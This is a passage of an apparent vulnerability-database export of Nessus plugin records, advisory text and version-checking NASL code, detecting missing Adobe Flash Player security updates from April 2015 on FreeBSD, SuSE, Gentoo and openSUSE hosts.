CVE-2015-3040).\n\n- These updates resolve a security bypass vulnerability that could\nlead to information disclosure (CVE-2015-3044).", "edition": 21, "published": "2015-04-20T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (3364d497-e4e6-11e4-a265-c485083ca99c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-20T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_3364D497E4E611E4A265C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/nessus/82890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82890);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (3364d497-e4e6-11e4-a265-c485083ca99c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe is aware of a report that an exploit for\nCVE-2015-3043 exists in the wild, and recommends users update their\nproduct installations to the latest versions.\n\n- These updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\nCVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n- These updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-0356).\n\n- These updates resolve a buffer overflow vulnerability that could\nlead to code execution (CVE-2015-0348).\n\n- These updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\nCVE-2015-3039).\n\n- These updates resolve double-free vulnerabilities that could lead to\ncode execution (CVE-2015-0346, CVE-2015-0359).\n\n- These updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-0357, CVE-2015-3040).\n\n- These updates resolve a security bypass vulnerability that could\nlead to information disclosure (CVE-2015-3044).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\"\n );\n # https://vuxml.freebsd.org/freebsd/3364d497-e4e6-11e4-a265-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f830ac3e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<=11.2r202.451\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<=11.2r202.451\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:17:18", "description": "Adobe Flash Player was updated to version 11.2.202.457 to fix several\nsecurity issues that could have lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities have been fixed :\n\n - Memory corruption vulnerabilities that could have lead\n to code execution. (CVE-2015-0347 / CVE-2015-0350 /\n CVE-2015-0352 / CVE-2015-0353 / CVE-2015-0354 /\n CVE-2015-0355 / CVE-2015-0360 / CVE-2015-3038 /\n CVE-2015-3041 / CVE-2015-3042 / CVE-2015-3043)\n\n - Type confusion vulnerability that could have lead to\n code execution. (CVE-2015-0356)\n\n - Buffer overflow vulnerability that could have lead to\n code execution. (CVE-2015-0348)\n\n - Use-after-free vulnerabilities that could have lead to\n code execution. (CVE-2015-0349 / CVE-2015-0351 /\n CVE-2015-0358 / CVE-2015-3039)\n\n - Double-free vulnerabilities that could have lead to code\n execution. (CVE-2015-0346 / CVE-2015-0359)\n\n - Memory leak vulnerabilities that could have been used to\n bypass ASLR. (CVE-2015-0357 / CVE-2015-3040)\n\n - Security bypass vulnerability that could have lead to\n information disclosure. (CVE-2015-3044)", "edition": 24, "published": "2015-04-16T00:00:00", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 10615)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-16T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-150415.NASL", "href": "https://www.tenable.com/plugins/nessus/82819", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82819);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 10615)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 11.2.202.457 to fix several\nsecurity issues that could have lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities have been fixed :\n\n - Memory corruption vulnerabilities that could have lead\n to code execution. (CVE-2015-0347 / CVE-2015-0350 /\n CVE-2015-0352 / CVE-2015-0353 / CVE-2015-0354 /\n CVE-2015-0355 / CVE-2015-0360 / CVE-2015-3038 /\n CVE-2015-3041 / CVE-2015-3042 / CVE-2015-3043)\n\n - Type confusion vulnerability that could have lead to\n code execution. (CVE-2015-0356)\n\n - Buffer overflow vulnerability that could have lead to\n code execution. (CVE-2015-0348)\n\n - Use-after-free vulnerabilities that could have lead to\n code execution. (CVE-2015-0349 / CVE-2015-0351 /\n CVE-2015-0358 / CVE-2015-3039)\n\n - Double-free vulnerabilities that could have lead to code\n execution. (CVE-2015-0346 / CVE-2015-0359)\n\n - Memory leak vulnerabilities that could have been used to\n bypass ASLR. (CVE-2015-0357 / CVE-2015-3040)\n\n - Security bypass vulnerability that could have lead to\n information disclosure. (CVE-2015-3044)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=927089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0347.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0349.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0354.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0355.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0358.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0360.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3038.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3040.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3041.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3042.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3043.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-3044.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10615.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.457-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.457-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:04:36", "description": "The remote host is affected by the vulnerability described in GLSA-201504-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "published": "2015-06-10T00:00:00", "title": "GLSA-201504-07 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-06-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-201504-07.NASL", "href": "https://www.tenable.com/plugins/nessus/84072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201504-07.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84072);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_bugtraq_id(74062, 74064, 74065, 74066, 74067, 74068, 74069);\n script_xref(name:\"GLSA\", value:\"201504-07\");\n\n script_name(english:\"GLSA-201504-07 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201504-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201504-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.457'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.457\"), vulnerable:make_list(\"lt 11.2.202.457\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:27", "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\nissues that could lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2015-0347, CVE-2015-0350,\n CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\n CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n - Type confusion vulnerability that could lead to code\n execution (CVE-2015-0356).\n\n - Buffer overflow vulnerability that could lead to code\n execution (CVE-2015-0348).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n\n - Double-free vulnerabilities that could lead to code\n execution (CVE-2015-0346, CVE-2015-0359).\n\n - Memory leak vulnerabilities that could be used to bypass\n ASLR (CVE-2015-0357, CVE-2015-3040).\n\n - Security bypass vulnerability that could lead to\n information disclosure (CVE-2015-3044).", "edition": 17, "published": "2015-04-16T00:00:00", "title": "openSUSE Security Update : Adobe Flash Player (openSUSE-2015-304)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-16T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-304.NASL", "href": "https://www.tenable.com/plugins/nessus/82807", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-304.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82807);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n\n script_name(english:\"openSUSE Security Update : Adobe Flash Player (openSUSE-2015-304)\");\n script_summary(english:\"Check for the openSUSE-2015-304 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.457 to fix several security\nissues that could lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2015-0347, CVE-2015-0350,\n CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\n CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n - Type confusion vulnerability that could lead to code\n execution (CVE-2015-0356).\n\n - Buffer overflow vulnerability that could lead to code\n execution (CVE-2015-0348).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2015-0349, 